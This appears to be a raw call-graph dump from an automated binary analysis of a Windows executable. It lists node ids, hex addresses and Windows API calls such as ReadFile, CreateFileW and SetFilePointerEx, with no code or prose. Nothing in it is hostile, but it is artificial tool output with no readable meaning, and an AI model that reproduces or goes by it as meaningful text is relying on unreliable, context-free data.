98741 424935 98739->98741 98838 428d68 58 API calls 98740->98838 98741->98731 98743 424925 98839 428ff6 9 API calls 98743->98839 98745 424930 98745->98731 98747 4310e3 98746->98747 98748 4310cc 98746->98748 98750 43181b 98747->98750 98754 43111d 98747->98754 98849 428d34 58 API calls 98748->98849 98865 428d34 58 API calls 98750->98865 98751 4310d1 98850 428d68 58 API calls 98751->98850 98756 431125 98754->98756 98763 43113c 98754->98763 98755 431820 98866 428d68 58 API calls 98755->98866 98851 428d34 58 API calls 98756->98851 98759 431131 98867 428ff6 9 API calls 98759->98867 98760 43112a 98852 428d68 58 API calls 98760->98852 98762 431151 98853 428d34 58 API calls 98762->98853 98763->98762 98765 43116b 98763->98765 98767 431189 98763->98767 98794 4310d8 98763->98794 98765->98762 98770 431176 98765->98770 98854 428a5d 58 API calls 98767->98854 98840 435ebb 98770->98840 98771 431199 98772 4311a1 98771->98772 98773 4311bc 98771->98773 98855 428d68 58 API calls 98772->98855 98857 431b11 60 API calls 98773->98857 98774 43128a 98776 431303 ReadFile 98774->98776 98781 4312a0 GetConsoleMode 98774->98781 98779 4317e3 GetLastError 98776->98779 98780 431325 98776->98780 98778 4311a6 98856 428d34 58 API calls 98778->98856 98783 4317f0 98779->98783 98784 4312e3 98779->98784 98780->98779 98788 4312f5 98780->98788 98785 431300 98781->98785 98786 4312b4 98781->98786 98863 428d68 58 API calls 98783->98863 98796 4312e9 98784->98796 98858 428d47 58 API calls 98784->98858 98785->98776 98786->98785 98789 4312ba ReadConsoleW 98786->98789 98788->98796 98797 43135a 98788->98797 98806 4315c7 98788->98806 98789->98788 98791 4312dd GetLastError 98789->98791 98790 4317f5 98864 428d34 58 API calls 98790->98864 98791->98784 98794->98731 98795 422f95 58 API calls 98795->98794 98796->98794 98796->98795 98798 4313c6 ReadFile 98797->98798 98804 431447 98797->98804 98800 4313e7 GetLastError 98798->98800 98813 4313f1 98798->98813 98800->98813 98801 431504 98808 4314b4 MultiByteToWideChar 98801->98808 98861 431b11 60 API calls 98801->98861 98802 4314f4 98860 428d68 58 API calls 98802->98860 98803 4316cd ReadFile 98807 4316f0 GetLastError 98803->98807 98811 4316fe 98803->98811 98804->98796 98804->98801 98804->98802 98804->98808 98806->98796 98806->98803 98807->98811 98808->98791 98808->98796 98811->98806 98862 431b11 60 API calls 98811->98862 98813->98797 98859 431b11 60 API calls 98813->98859 98815 430e02 98814->98815 98819 430e17 98814->98819 98901 428d68 58 API calls 98815->98901 98817 430e12 98817->98731 98818 430e07 98902 428ff6 9 API calls 98818->98902 98819->98817 98821 430e4c 98819->98821 98903 436234 58 API calls 98819->98903 98823 424916 58 API calls 98821->98823 98824 430e60 98823->98824 98868 430f97 98824->98868 98826 430e67 98826->98817 98827 424916 58 API calls 98826->98827 98828 430e8a 98827->98828 98828->98817 98829 424916 58 API calls 98828->98829 98830 430e96 98829->98830 98830->98817 98831 424916 58 API calls 98830->98831 98832 430ea3 98831->98832 98833 424916 58 API calls 98832->98833 98833->98817 98834->98726 98835->98728 98836->98731 98837->98726 98838->98743 98839->98745 98841 435ed3 98840->98841 98842 435ec6 98840->98842 98844 435edf 98841->98844 98845 428d68 58 API calls 98841->98845 98843 428d68 58 API calls 98842->98843 98846 435ecb 98843->98846 98844->98774 98847 435f00 98845->98847 98846->98774 98848 428ff6 9 API calls 98847->98848 98848->98846 98849->98751 98850->98794 98851->98760 98852->98759 98853->98760 98854->98771 98855->98778 98856->98794 98857->98770 98858->98796 98859->98813 98860->98796 98861->98808 98862->98811 98863->98790 98864->98796 98865->98755 98866->98759 98867->98794 98869 430fa3 98868->98869 98870 430fb0 98869->98870 98871 430fc7 98869->98871 98872 428d34 58 API calls 98870->98872 98873 43108b 98871->98873 98876 430fdb 98871->98876 98875 430fb5 98872->98875 98874 428d34 58 API calls 98873->98874 98877 430ffe 98874->98877 98878 428d68 58 API calls 98875->98878 98879 431006 98876->98879 98880 430ff9 98876->98880 98887 428d68 58 API calls 98877->98887 98883 430fbc 98878->98883 98881 431013 98879->98881 98882 431028 98879->98882 98884 428d34 58 API calls 98880->98884 98885 428d34 58 API calls 98881->98885 98886 42d446 59 API calls 98882->98886 98883->98826 98884->98877 98888 431018 98885->98888 98889 43102e 98886->98889 98890 431020 98887->98890 98891 428d68 58 API calls 98888->98891 98892 431041 98889->98892 98893 431054 98889->98893 98895 428ff6 9 API calls 98890->98895 98891->98890 98894 4310ab 70 API calls 98892->98894 98896 428d68 58 API calls 98893->98896 98899 43104d 98894->98899 98895->98883 98897 431059 98896->98897 98898 428d34 58 API calls 98897->98898 98898->98899 98900 431083 LeaveCriticalSection 98899->98900 98900->98883 98901->98818 98902->98817 98903->98821 98907 42543a GetSystemTimeAsFileTime 98904->98907 98906 4691f8 98906->98496 98908 425468 98907->98908 98908->98906 98910 425e9c 98909->98910 98911 425ec3 98910->98911 98912 425eae 98910->98912 98914 426e4e 59 API calls 98911->98914 98923 428d68 58 API calls 98912->98923 98916 425ec9 98914->98916 98915 425eb3 98924 428ff6 9 API calls 98915->98924 98925 425b00 67 API calls 98916->98925 98919 425ed4 98926 425ef4 LeaveCriticalSection LeaveCriticalSection 98919->98926 98921 425ee6 98922 425ebe 98921->98922 98922->98501 98923->98915 98924->98922 98925->98919 98926->98921 98927->98354 98928->98362 98929->98375 98930->98377 98931->98374 98932->98383 98934 4092c9 98933->98934 98935 43f5c8 98934->98935 98940 4092d3 98934->98940 98936 420ff6 59 API calls 98935->98936 98938 43f5d4 98936->98938 98937 4092da 98937->98387 98940->98937 98941 409df0 59 API calls 98940->98941 98941->98940 98942->98398 98943->98396 98948 4699d2 98944->98948 98945 469866 98945->98404 98945->98431 98946 40506b 74 API calls 98946->98948 98947 469393 GetSystemTimeAsFileTime 98947->98948 98948->98945 98948->98946 98948->98947 98949 405045 85 API calls 98948->98949 98949->98948 98951 468da9 98950->98951 98952 468d9b 98950->98952 98954 468dee 98951->98954 98955 42548b 115 API calls 98951->98955 98965 468db2 98951->98965 98953 42548b 115 API calls 98952->98953 98953->98951 98981 46901b 98954->98981 98957 468dd3 98955->98957 98957->98954 98958 468ddc 98957->98958 98962 4255d6 83 API calls 98958->98962 98958->98965 98959 468e32 98960 468e36 98959->98960 98961 468e57 98959->98961 98964 468e43 98960->98964 98967 4255d6 83 API calls 98960->98967 98985 468c33 98961->98985 98962->98965 98964->98965 98969 4255d6 83 API calls 98964->98969 98965->98433 98967->98964 98968 468e85 98994 468eb5 98968->98994 98969->98965 98970 468e65 98973 4255d6 83 API calls 98970->98973 98974 468e72 98970->98974 98973->98974 98974->98965 98976 4255d6 83 API calls 98974->98976 98976->98965 98978 468ea0 98978->98965 98980 4255d6 83 API calls 98978->98980 98980->98965 98982 469040 98981->98982 98984 469029 98981->98984 98983 425812 74 API calls 98982->98983 98983->98984 98984->98959 98986 42594c 58 API calls 98985->98986 98987 468c42 98986->98987 98988 42594c 58 API calls 98987->98988 98989 468c56 98988->98989 98990 42594c 58 API calls 98989->98990 98991 468c6a 98990->98991 98992 468f97 58 API calls 98991->98992 98993 468c7d 98991->98993 98992->98993 98993->98968 98993->98970 98998 468eca 98994->98998 98995 468f82 99023 4691bf 98995->99023 98996 468c8f 74 API calls 98996->98998 98998->98995 98998->98996 99001 468e8c 98998->99001 99027 468d2b 74 API calls 98998->99027 99028 46909c 80 API calls 98998->99028 99002 468f97 99001->99002 99003 468fa4 99002->99003 99004 468faa 99002->99004 99005 422f95 58 API calls 99003->99005 99006 422f95 58 API calls 99004->99006 99007 468fbb 99004->99007 99005->99004 99006->99007 99008 468e93 99007->99008 99009 422f95 58 API calls 99007->99009 99008->98978 99010 4255d6 99008->99010 99009->99008 99011 4255e2 99010->99011 99012 4255f6 99011->99012 99013 42560e 99011->99013 99110 428d68 58 API calls 99012->99110 99016 426e4e 59 API calls 99013->99016 99019 425606 99013->99019 99015 4255fb 99111 428ff6 9 API calls 99015->99111 99018 425620 99016->99018 99094 42556a 99018->99094 99019->98978 99024 4691dd 99023->99024 99025 4691cc 99023->99025 99024->99001 99029 424a93 99025->99029 99027->98998 99028->98998 99030 424a9f 99029->99030 99031 424ad5 99030->99031 99032 424abd 99030->99032 99033 424acd 99030->99033 99034 426e4e 59 API calls 99031->99034 99054 428d68 58 API calls 99032->99054 99033->99024 99036 424adb 99034->99036 99042 42493a 99036->99042 99037 424ac2 99055 428ff6 9 API calls 99037->99055 99044 424949 99042->99044 99049 424967 99042->99049 99043 424957 99085 428d68 58 API calls 99043->99085 99044->99043 99044->99049 99052 424981 99044->99052 99046 42495c 99086 428ff6 9 API calls 99046->99086 99056 424b0d LeaveCriticalSection LeaveCriticalSection 99049->99056 99051 424916 58 API calls 99051->99052 99052->99049 99052->99051 99057 42dac6 99052->99057 99087 424c6d 99052->99087 99093 42b05e 78 API calls 99052->99093 99054->99037 99055->99033 99056->99033 99058 42dad2 99057->99058 99059 42daf6 99058->99059 99060 42dadf 99058->99060 99062 42db95 99059->99062 99065 42db0a 99059->99065 99061 428d34 58 API calls 99060->99061 99064 42dae4 99061->99064 99063 428d34 58 API calls 99062->99063 99066 42db2d 99063->99066 99067 428d68 58 API calls 99064->99067 99068 42db32 99065->99068 99069 42db28 99065->99069 99072 428d68 58 API calls 99066->99072 99080 42daeb 99067->99080 99071 42d446 59 API calls 99068->99071 99070 428d34 58 API calls 99069->99070 99070->99066 99073 42db38 99071->99073 99074 42dba1 99072->99074 99075 42db4b 99073->99075 99076 42db5e 99073->99076 99077 428ff6 9 API calls 99074->99077 99078 42dbb5 76 API calls 99075->99078 99079 428d68 58 API calls 99076->99079 99077->99080 99081 42db57 99078->99081 99082 42db63 99079->99082 99080->99052 99084 42db8d LeaveCriticalSection 99081->99084 99083 428d34 58 API calls 99082->99083 99083->99081 99084->99080 99085->99046 99086->99049 99088 424c80 99087->99088 99092 424ca4 99087->99092 99089 424916 58 API calls 99088->99089 99088->99092 99090 424c9d 99089->99090 99091 42dac6 78 API calls 99090->99091 99091->99092 99092->99052 99093->99052 99095 425579 99094->99095 99096 42558d 99094->99096 99143 428d68 58 API calls 99095->99143 99099 425589 99096->99099 99100 424c6d 78 API calls 99096->99100 99098 42557e 99144 428ff6 9 API calls 99098->99144 99112 425645 LeaveCriticalSection LeaveCriticalSection 99099->99112 99102 425599 99100->99102 99113 430dc7 99102->99113 99105 424916 58 API calls 99106 4255a7 99105->99106 99117 430c52 99106->99117 99108 4255ad 99108->99099 99109 422f95 58 API calls 99108->99109 99109->99099 99110->99015 99111->99019 99112->99019 99114 430dd4 99113->99114 99116 4255a1 99113->99116 99115 422f95 58 API calls 99114->99115 99114->99116 99115->99116 99116->99105 99118 430c5e 99117->99118 99119 430c82 99118->99119 99120 430c6b 99118->99120 99121 430d0d 99119->99121 99123 430c92 99119->99123 99169 428d34 58 API calls 99120->99169 99174 428d34 58 API calls 99121->99174 99126 430cb0 99123->99126 99127 430cba 99123->99127 99125 430c70 99170 428d68 58 API calls 99125->99170 99171 428d34 58 API calls 99126->99171 99145 42d446 99127->99145 99128 430cb5 99175 428d68 58 API calls 99128->99175 99133 430cc0 99135 430cd3 99133->99135 99136 430cde 99133->99136 99134 430d19 99176 428ff6 9 API calls 99134->99176 99154 430d2d 99135->99154 99172 428d68 58 API calls 99136->99172 99139 430c77 99139->99108 99141 430cd9 99173 430d05 LeaveCriticalSection 99141->99173 99143->99098 99144->99099 99146 42d452 99145->99146 99147 42d4a1 EnterCriticalSection 99146->99147 99149 429e4b 58 API calls 99146->99149 99148 42d4c7 99147->99148 99148->99133 99150 42d477 99149->99150 99151 42d48f 99150->99151 99177 42a06b InitializeCriticalSectionAndSpinCount 99150->99177 99178 42d4cb LeaveCriticalSection 99151->99178 99179 42d703 99154->99179 99156 430d91 99192 42d67d 59 API calls 99156->99192 99157 430d3b 99157->99156 99158 430d6f 99157->99158 99160 42d703 58 API calls 99157->99160 99158->99156 99161 42d703 58 API calls 99158->99161 99163 430d66 99160->99163 99164 430d7b FindCloseChangeNotification 99161->99164 99162 430d99 99165 430dbb 99162->99165 99193 428d47 58 API calls 99162->99193 99166 42d703 58 API calls 99163->99166 99164->99156 99167 430d87 GetLastError 99164->99167 99165->99141 99166->99158 99167->99156 99169->99125 99170->99139 99171->99128 99172->99141 99173->99139 99174->99128 99175->99134 99176->99139 99177->99151 99178->99147 99180 42d723 99179->99180 99181 42d70e 99179->99181 99184 428d34 58 API calls 99180->99184 99186 42d748 99180->99186 99182 428d34 58 API calls 99181->99182 99183 42d713 99182->99183 99185 428d68 58 API calls 99183->99185 99187 42d752 99184->99187 99188 42d71b 99185->99188 99186->99157 99189 428d68 58 API calls 99187->99189 99188->99157 99190 42d75a 99189->99190 99191 428ff6 9 API calls 99190->99191 99191->99188 99192->99162 99193->99165 99256 431b90 99194->99256 99197 4048f7 99262 407eec 99197->99262 99198 4048da 99199 407d2c 59 API calls 99198->99199 99201 4048e6 99199->99201 99258 407886 99201->99258 99204 4209d5 99205 431b90 99204->99205 99206 4209e2 GetLongPathNameW 99205->99206 99207 407d2c 59 API calls 99206->99207 99208 40741d 99207->99208 99209 40716b 99208->99209 99210 4077c7 59 API calls 99209->99210 99211 40717d 99210->99211 99212 4048ae 60 API calls 99211->99212 99213 407188 99212->99213 99214 407193 99213->99214 99215 43ecae 99213->99215 99217 403f84 59 API calls 99214->99217 99219 43ecc8 99215->99219 99276 407a68 61 API calls 99215->99276 99218 40719f 99217->99218 99270 4034c2 99218->99270 99221 4071b2 99221->98122 99223 404f3d 136 API calls 99222->99223 99224 4069ef 99223->99224 99225 43e45a 99224->99225 99227 404f3d 136 API calls 99224->99227 99226 4697e5 122 API calls 99225->99226 99228 43e46f 99226->99228 99229 406a03 99227->99229 99231 43e473 99228->99231 99232 43e490 99228->99232 99229->99225 99230 406a0b 99229->99230 99233 406a17 99230->99233 99234 43e47b 99230->99234 99235 404faa 84 API calls 99231->99235 99236 420ff6 59 API calls 99232->99236 99277 406bec 99233->99277 99387 464534 90 API calls 99234->99387 99235->99234 99248 43e4d5 99236->99248 99240 43e489 99240->99232 99241 43e689 99242 422f95 58 API calls 99241->99242 99243 43e691 99242->99243 99244 404faa 84 API calls 99243->99244 99250 43e69a 99244->99250 99248->99241 99248->99250 99253 407f41 59 API calls 99248->99253 99370 45fc4d 99248->99370 99373 40766f 99248->99373 99381 4074bd 99248->99381 99388 45fb6e 61 API calls 99248->99388 99389 467621 59 API calls 99248->99389 99249 422f95 58 API calls 99249->99250 99250->99249 99251 404faa 84 API calls 99250->99251 99390 45fcb1 89 API calls 99250->99390 99251->99250 99253->99248 99257 4048bb GetFullPathNameW 99256->99257 99257->99197 99257->99198 99259 407894 99258->99259 99266 407e8c 99259->99266 99261 4048f2 99261->99204 99263 407f06 99262->99263 99265 407ef9 99262->99265 99264 420ff6 59 API calls 99263->99264 99264->99265 99265->99201 99267 407ea3 99266->99267 99268 407e9a 99266->99268 99267->99261 99268->99267 99269 407faf 59 API calls 99268->99269 99269->99267 99271 4034d4 99270->99271 99275 4034f3 99270->99275 99274 420ff6 59 API calls 99271->99274 99272 420ff6 59 API calls 99273 40350a 99272->99273 99273->99221 99274->99275 99275->99272 99276->99215 99278 43e847 99277->99278 99279 406c15 99277->99279 99482 45fcb1 89 API calls 99278->99482 99396 405906 60 API calls 99279->99396 99282 43e85a 99483 45fcb1 89 API calls 99282->99483 99283 406c37 99397 405956 99283->99397 99287 406c54 99289 4077c7 59 API calls 99287->99289 99288 43e876 99319 406cc1 99288->99319 99290 406c60 99289->99290 99410 420b9b 60 API calls 99290->99410 99292 406c6c 99295 4077c7 59 API calls 99292->99295 99293 43e889 99296 405dcf CloseHandle 99293->99296 99294 406ccf 99297 4077c7 59 API calls 99294->99297 99298 406c78 99295->99298 99299 43e895 99296->99299 99300 406cd8 99297->99300 99301 4048ae 60 API calls 99298->99301 99302 404f3d 136 API calls 99299->99302 99303 4077c7 59 API calls 99300->99303 99304 406c86 99301->99304 99305 43e8b1 99302->99305 99306 406ce1 99303->99306 99411 4059b0 ReadFile SetFilePointerEx 99304->99411 99308 43e8da 99305->99308 99313 4697e5 122 API calls 99305->99313 99420 4046f9 99306->99420 99484 45fcb1 89 API calls 99308->99484 99310 406cf8 99314 407c8e 59 API calls 99310->99314 99312 406cb2 99412 405c4e 99312->99412 99317 43e8cd 99313->99317 99318 406d09 SetCurrentDirectoryW 99314->99318 99315 43e8f1 99348 406e6c 99315->99348 99320 43e8f6 99317->99320 99321 43e8d5 99317->99321 99326 406d1c 99318->99326 99319->99293 99319->99294 99323 404faa 84 API calls 99320->99323 99322 404faa 84 API calls 99321->99322 99322->99308 99324 43e8fb 99323->99324 99325 420ff6 59 API calls 99324->99325 99332 43e92f 99325->99332 99328 420ff6 59 API calls 99326->99328 99330 406d2f 99328->99330 99329 403bcd 99329->97976 99329->97985 99331 40538e 59 API calls 99330->99331 99359 406d3a 99331->99359 99333 40766f 59 API calls 99332->99333 99367 43e978 99333->99367 99334 406e47 99478 405dcf 99334->99478 99335 43eb69 99488 467581 59 API calls 99335->99488 99341 43eb8b 99489 46f835 59 API calls 99341->99489 99344 43eb98 99346 422f95 58 API calls 99344->99346 99345 43ec02 99492 45fcb1 89 API calls 99345->99492 99346->99348 99391 405934 99348->99391 99350 40766f 59 API calls 99350->99367 99351 43ec1b 99351->99334 99353 43ebfa 99491 45fb07 59 API calls 99353->99491 99356 407f41 59 API calls 99356->99359 99358 45fc4d 59 API calls 99358->99367 99359->99334 99359->99345 99359->99353 99359->99356 99471 4059cd 67 API calls 99359->99471 99472 4070bd GetStringTypeW 99359->99472 99473 40702c 60 API calls 99359->99473 99474 40710a GetStringTypeW 99359->99474 99475 42387d GetStringTypeW 99359->99475 99476 406a3c 165 API calls 99359->99476 99477 407373 59 API calls 99359->99477 99360 407f41 59 API calls 99360->99367 99364 43ebbb 99490 45fcb1 89 API calls 99364->99490 99366 43ebd4 99368 422f95 58 API calls 99366->99368 99367->99335 99367->99350 99367->99358 99367->99360 99367->99364 99485 45fb6e 61 API calls 99367->99485 99486 467621 59 API calls 99367->99486 99487 407373 59 API calls 99367->99487 99369 43ebe7 99368->99369 99369->99348 99371 420ff6 59 API calls 99370->99371 99372 45fc7d 99371->99372 99372->99248 99374 40770f 99373->99374 99377 407682 99373->99377 99376 420ff6 59 API calls 99374->99376 99375 420ff6 59 API calls 99378 407689 99375->99378 99376->99377 99377->99375 99379 420ff6 59 API calls 99378->99379 99380 4076b2 99378->99380 99379->99380 99380->99248 99382 40757e 99381->99382 99383 4074d0 99381->99383 99382->99248 99384 420ff6 59 API calls 99383->99384 99386 407502 99383->99386 99384->99386 99385 420ff6 59 API calls 99385->99386 99386->99382 99386->99385 99387->99240 99388->99248 99389->99248 99390->99250 99392 405dcf CloseHandle 99391->99392 99393 40593c 99392->99393 99394 405dcf CloseHandle 99393->99394 99395 40594b 99394->99395 99395->99329 99396->99283 99398 405dcf CloseHandle 99397->99398 99399 405962 99398->99399 99493 405df9 99399->99493 99401 4059a4 99401->99282 99401->99287 99402 405981 99402->99401 99501 405770 99402->99501 99404 405993 99518 4053db SetFilePointerEx SetFilePointerEx 99404->99518 99406 43e030 99519 463696 SetFilePointerEx SetFilePointerEx WriteFile 99406->99519 99407 40599a 99407->99401 99407->99406 99409 43e060 99409->99401 99410->99292 99411->99312 99419 405c68 99412->99419 99413 405cef SetFilePointerEx 99532 405dae SetFilePointerEx 99413->99532 99416 43e151 99533 405dae SetFilePointerEx 99416->99533 99417 405cc3 99417->99319 99418 43e16b 99419->99413 99419->99416 99419->99417 99421 4077c7 59 API calls 99420->99421 99422 40470f 99421->99422 99423 4077c7 59 API calls 99422->99423 99424 404717 99423->99424 99425 4077c7 59 API calls 99424->99425 99426 40471f 99425->99426 99427 4077c7 59 API calls 99426->99427 99428 404727 99427->99428 99429 43d8fb 99428->99429 99430 40475b 99428->99430 99431 4081a7 59 API calls 99429->99431 99432 4079ab 59 API calls 99430->99432 99433 43d904 99431->99433 99434 404769 99432->99434 99435 407eec 59 API calls 99433->99435 99436 407e8c 59 API calls 99434->99436 99438 40479e 99435->99438 99437 404773 99436->99437 99437->99438 99439 4079ab 59 API calls 99437->99439 99441 43d924 99438->99441 99442 4047bd 99438->99442 99457 4047de 99438->99457 99443 404794 99439->99443 99445 43d9f4 99441->99445 99455 43d9dd 99441->99455 99464 43d95b 99441->99464 99447 407b52 59 API calls 99442->99447 99446 407e8c 59 API calls 99443->99446 99444 4047ef 99449 4081a7 59 API calls 99444->99449 99451 404801 99444->99451 99448 407d2c 59 API calls 99445->99448 99446->99438 99452 4047c7 99447->99452 99466 43d9b1 99448->99466 99449->99451 99450 404811 99456 404818 99450->99456 99458 4081a7 59 API calls 99450->99458 99451->99450 99454 4081a7 59 API calls 99451->99454 99453 4079ab 59 API calls 99452->99453 99452->99457 99453->99457 99454->99450 99455->99445 99460 43d9c8 99455->99460 99459 4081a7 59 API calls 99456->99459 99468 40481f 99456->99468 99534 4079ab 99457->99534 99458->99456 99459->99468 99462 407d2c 59 API calls 99460->99462 99461 43d9b9 99463 407d2c 59 API calls 99461->99463 99462->99466 99463->99466 99464->99461 99469 43d9a4 99464->99469 99465 407b52 59 API calls 99465->99466 99466->99457 99466->99465 99547 407a84 59 API calls 99466->99547 99468->99310 99470 407d2c 59 API calls 99469->99470 99470->99466 99471->99359 99472->99359 99473->99359 99474->99359 99475->99359 99476->99359 99477->99359 99479 405de8 99478->99479 99480 405dd9 99478->99480 99479->99480 99482->99282 99483->99288 99484->99315 99485->99367 99486->99367 99487->99367 99488->99341 99489->99344 99490->99366 99491->99345 99492->99351 99494 43e181 99493->99494 99495 405e12 CreateFileW 99493->99495 99496 405e34 99494->99496 99497 43e187 CreateFileW 99494->99497 99495->99496 99496->99402 99497->99496 99498 43e1ad 99497->99498 99499 405c4e 2 API calls 99498->99499 99500 43e1b8 99499->99500 99500->99496 99502 40578b 99501->99502 99503 43dfce 99501->99503 99504 405c4e 2 API calls 99502->99504 99512 40581a 99502->99512 99503->99512 99526 405e3f 99503->99526 99505 4057ad 99504->99505 99506 40538e 59 API calls 99505->99506 99508 4057b7 99506->99508 99508->99503 99509 4057c4 99508->99509 99510 420ff6 59 API calls 99509->99510 99511 4057cf 99510->99511 99513 40538e 59 API calls 99511->99513 99512->99404 99514 4057da 99513->99514 99520 405d20 99514->99520 99516 405807 99517 405c4e 2 API calls 99516->99517 99517->99512 99518->99407 99519->99409 99521 405d93 99520->99521 99522 405d2e 99520->99522 99531 405dae SetFilePointerEx 99521->99531 99524 405d56 99522->99524 99525 405d66 ReadFile 99522->99525 99524->99516 99525->99522 99525->99524 99527 405c4e 2 API calls 99526->99527 99528 405e60 99527->99528 99529 405c4e 2 API calls 99528->99529 99530 405e74 99529->99530 99530->99512 99531->99522 99532->99417 99533->99418 99535 407a17 99534->99535 99536 4079ba 99534->99536 99537 407e8c 59 API calls 99535->99537 99536->99535 99538 4079c5 99536->99538 99544 4079e8 99537->99544 99539 4079e0 99538->99539 99540 43ef32 99538->99540 99548 408087 59 API calls 99539->99548 99549 408189 99540->99549 99543 43ef3c 99545 420ff6 59 API calls 99543->99545 99544->99444 99546 43ef5c 99545->99546 99547->99466 99548->99544 99550 420ff6 59 API calls 99549->99550 99551 408193 99550->99551 99551->99543 99552->98133 99554 406ef5 99553->99554 99559 407009 99553->99559 99555 420ff6 59 API calls 99554->99555 99554->99559 99556 406f1c 99555->99556 99557 420ff6 59 API calls 99556->99557 99563 406f91 99557->99563 99559->98137 99561 4074bd 59 API calls 99561->99563 99562 40766f 59 API calls 99562->99563 99563->99559 99563->99561 99563->99562 99566 4063a0 99563->99566 99592 456ac9 59 API calls 99563->99592 99564->98139 99565->98141 99593 407b76 99566->99593 99568 4065ca 99569 40766f 59 API calls 99568->99569 99570 4065e4 99569->99570 99570->99563 99573 43e41f 99602 45fdba 91 API calls 99573->99602 99574 407eec 59 API calls 99585 4063c5 99574->99585 99575 40766f 59 API calls 99575->99585 99576 4068f9 99576->99570 99603 45fdba 91 API calls 99576->99603 99580 43e42d 99583 43e3bb 99584 408189 59 API calls 99583->99584 99586 43e3c6 99584->99586 99585->99568 99585->99573 99585->99574 99585->99575 99585->99576 99585->99583 99588 407faf 59 API calls 99585->99588 99591 43e3eb 99585->99591 99598 4060cc 60 API calls 99585->99598 99599 405ea1 59 API calls 99585->99599 99600 405fd2 60 API calls 99585->99600 99601 407a84 59 API calls 99585->99601 99590 420ff6 59 API calls 99586->99590 99589 40659b CharUpperBuffW 99588->99589 99589->99585 99590->99591 99591->99573 99591->99576 99592->99563 99594 420ff6 59 API calls 99593->99594 99595 407b9b 99594->99595 99596 408189 59 API calls 99595->99596 99597 407baa 99596->99597 99597->99585 99598->99585 99599->99585 99600->99585 99601->99585 99602->99580 99603->99570 99604->98155 99605->98156 99607 404227 99606->99607 99608 43d638 99606->99608 99607->98167 99632 463226 62 API calls 99607->99632 99608->99607 99632->98167 99690->98245 99691->98245 99695->98184 99696->98184 99697->98184 99698->98245 99699->98245 99700->98245 99719->98245 99720->98245 99721->98245 100136 440226 100145 40ade2 100136->100145 100138 440c86 100252 4566f4 100138->100252 100140 440c8f 100142 4400e0 VariantClear 100142->100145 100143 40b6c1 100251 46a0b5 89 API calls 100143->100251 100145->100138 100145->100140 100145->100142 100145->100143 100150 46d2e6 100145->100150 100197 47474d 100145->100197 100206 412123 100145->100206 100246 47e237 100145->100246 100249 409df0 59 API calls 100145->100249 100250 457405 59 API calls 100145->100250 100151 46d310 100150->100151 100152 46d305 100150->100152 100156 4077c7 59 API calls 100151->100156 100195 46d3ea 100151->100195 100255 409c9c 59 API calls 100152->100255 100154 420ff6 59 API calls 100155 46d433 100154->100155 100159 46d43f 100155->100159 100258 405906 60 API calls 100155->100258 100157 46d334 100156->100157 100160 4077c7 59 API calls 100157->100160 100161 409997 84 API calls 100159->100161 100162 46d33d 100160->100162 100163 46d457 100161->100163 100164 409997 84 API calls 100162->100164 100165 405956 67 API calls 100163->100165 100166 46d349 100164->100166 100167 46d466 100165->100167 100168 4046f9 59 API calls 100166->100168 100170 46d49e 100167->100170 100171 46d46a GetLastError 100167->100171 100169 46d35e 100168->100169 100172 407c8e 59 API calls 100169->100172 100175 46d500 100170->100175 100176 46d4c9 100170->100176 100173 46d483 100171->100173 100174 46d391 100172->100174 100193 46d3f3 100173->100193 100259 405a1a CloseHandle 100173->100259 100177 46d3e3 100174->100177 100182 463e73 3 API calls 100174->100182 100178 420ff6 59 API calls 100175->100178 100179 420ff6 59 API calls 100176->100179 100257 409c9c 59 API calls 100177->100257 100183 46d505 100178->100183 100184 46d4ce 100179->100184 100185 46d3a1 100182->100185 100188 4077c7 59 API calls 100183->100188 100183->100193 100186 46d4df 100184->100186 100189 4077c7 59 API calls 100184->100189 100185->100177 100187 46d3a5 100185->100187 100260 46f835 59 API calls 100186->100260 100191 407f41 59 API calls 100187->100191 100188->100193 100189->100186 100192 46d3b2 100191->100192 100256 463c66 63 API calls 100192->100256 100193->100145 100195->100154 100195->100193 100196 46d3bb 100196->100177 100198 409997 84 API calls 100197->100198 100199 474787 100198->100199 100200 4063a0 94 API calls 100199->100200 100201 474797 100200->100201 100202 4747bc 100201->100202 100203 40a000 341 API calls 100201->100203 100205 4747c0 100202->100205 100261 409bf8 100202->100261 100203->100202 100205->100145 100207 409bf8 59 API calls 100206->100207 100208 41213b 100207->100208 100209 420ff6 59 API calls 100208->100209 100214 4469af 100208->100214 100211 412154 100209->100211 100212 412164 100211->100212 100289 405906 60 API calls 100211->100289 100216 409997 84 API calls 100212->100216 100213 412189 100221 412196 100213->100221 100294 409c9c 59 API calls 100213->100294 100214->100213 100293 46f7df 59 API calls 100214->100293 100218 412172 100216->100218 100220 405956 67 API calls 100218->100220 100219 4469f7 100219->100221 100222 4469ff 100219->100222 100223 412181 100220->100223 100225 405e3f 2 API calls 100221->100225 100295 409c9c 59 API calls 100222->100295 100223->100213 100223->100214 100292 405a1a CloseHandle 100223->100292 100227 41219d 100225->100227 100228 446a11 100227->100228 100229 4121b7 100227->100229 100231 420ff6 59 API calls 100228->100231 100230 4077c7 59 API calls 100229->100230 100232 4121bf 100230->100232 100233 446a17 100231->100233 100274 4056d2 100232->100274 100235 446a2b 100233->100235 100296 4059b0 ReadFile SetFilePointerEx 100233->100296 100240 446a2f 100235->100240 100297 46794e 59 API calls 100235->100297 100237 4121ce 100237->100240 100290 409b9c 59 API calls 100237->100290 100241 4121e2 100242 41221c 100241->100242 100243 405dcf CloseHandle 100241->100243 100242->100145 100244 412210 100243->100244 100244->100242 100291 405a1a CloseHandle 100244->100291 100247 47cdf1 130 API calls 100246->100247 100248 47e247 100247->100248 100248->100145 100249->100145 100250->100145 100251->100138 100335 456636 100252->100335 100254 456702 100254->100140 100255->100151 100256->100196 100257->100195 100258->100159 100259->100193 100260->100193 100262 43fbff 100261->100262 100263 409c08 100261->100263 100264 407d2c 59 API calls 100262->100264 100266 43fc10 100262->100266 100268 420ff6 59 API calls 100263->100268 100264->100266 100265 407eec 59 API calls 100267 43fc1a 100265->100267 100266->100265 100271 409c34 100267->100271 100272 4077c7 59 API calls 100267->100272 100269 409c1b 100268->100269 100269->100267 100270 409c26 100269->100270 100270->100271 100273 407f41 59 API calls 100270->100273 100271->100205 100272->100271 100273->100271 100275 405702 100274->100275 100276 4056dd 100274->100276 100277 407eec 59 API calls 100275->100277 100276->100275 100281 4056ec 100276->100281 100280 46349a 100277->100280 100278 4634c9 100278->100237 100280->100278 100298 463436 ReadFile SetFilePointerEx 100280->100298 100299 407a84 59 API calls 100280->100299 100300 405c18 100281->100300 100288 4635d8 100288->100237 100289->100212 100290->100241 100291->100242 100292->100214 100293->100214 100294->100219 100295->100227 100296->100235 100297->100240 100298->100280 